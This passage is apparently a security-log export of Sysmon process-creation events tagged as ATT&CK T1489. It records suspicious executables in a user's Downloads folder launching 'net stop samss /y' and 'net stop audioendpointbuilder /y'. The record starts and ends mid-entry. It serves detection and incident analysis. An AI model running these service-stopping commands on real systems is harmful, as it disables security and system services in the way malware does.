System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010f1683100}\r\nParentProcessId: 153288\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:15.051"",""processGuid"":""{df9fc3d3-d1cb-5ec7-0000-0010c4723100}"",""processId"":""153708"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1ca-5ec7-0000-0010f1683100}"",""parentProcessId"":""153288"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:39:23.509",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:14.828 +ProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010f1683100} +ProcessId: 153288 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:14.853777300Z"",""eventRecordID"":""1147"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:14.828\r\nProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010f1683100}\r\nProcessId: 153288\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:14.828"",""processGuid"":""{df9fc3d3-d1ca-5ec7-0000-0010f1683100}"",""processId"":""153288"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:39:23.415",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:14.837 +ProcessGuid: {df9fc3d3-d1ca-5ec7-0000-001078693100} +ProcessId: 153300 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010ce5c3100} +ParentProcessId: 152704 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:14.848620000Z"",""eventRecordID"":""1146"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:14.837\r\nProcessGuid: {df9fc3d3-d1ca-5ec7-0000-001078693100}\r\nProcessId: 153300\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010ce5c3100}\r\nParentProcessId: 152704\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:14.837"",""processGuid"":""{df9fc3d3-d1ca-5ec7-0000-001078693100}"",""processId"":""153300"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1ca-5ec7-0000-0010ce5c3100}"",""parentProcessId"":""152704"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:39:23.380",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:14.581 +ProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010ce5c3100} +ProcessId: 152704 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:14.590578100Z"",""eventRecordID"":""1145"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:14.581\r\nProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010ce5c3100}\r\nProcessId: 152704\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:14.581"",""processGuid"":""{df9fc3d3-d1ca-5ec7-0000-0010ce5c3100}"",""processId"":""152704"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:39:18.934",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:08.639 +ProcessGuid: {df9fc3d3-d1c4-5ec7-0000-0010470d3000} +ProcessId: 146872 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00107bc12f00} +ParentProcessId: 146424 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:08.645573600Z"",""eventRecordID"":""1144"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:08.639\r\nProcessGuid: {df9fc3d3-d1c4-5ec7-0000-0010470d3000}\r\nProcessId: 146872\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00107bc12f00}\r\nParentProcessId: 146424\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:08.639"",""processGuid"":""{df9fc3d3-d1c4-5ec7-0000-0010470d3000}"",""processId"":""146872"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1c3-5ec7-0000-00107bc12f00}"",""parentProcessId"":""146424"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:39:16.313",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:08.096 +ProcessGuid: {df9fc3d3-d1c4-5ec7-0000-0010b9eb2f00} +ProcessId: 146476 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00105eae2f00} +ParentProcessId: 146396 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:08.127730700Z"",""eventRecordID"":""1143"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:08.096\r\nProcessGuid: {df9fc3d3-d1c4-5ec7-0000-0010b9eb2f00}\r\nProcessId: 146476\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00105eae2f00}\r\nParentProcessId: 146396\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:08.096"",""processGuid"":""{df9fc3d3-d1c4-5ec7-0000-0010b9eb2f00}"",""processId"":""146476"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1c3-5ec7-0000-00105eae2f00}"",""parentProcessId"":""146396"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:39:16.294",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:07.627 +ProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00107bc12f00} +ProcessId: 146424 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:07.817795500Z"",""eventRecordID"":""1142"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:07.627\r\nProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00107bc12f00}\r\nProcessId: 146424\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:07.627"",""processGuid"":""{df9fc3d3-d1c3-5ec7-0000-00107bc12f00}"",""processId"":""146424"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:39:16.216",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:07.328 +ProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00105eae2f00} +ProcessId: 146396 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ 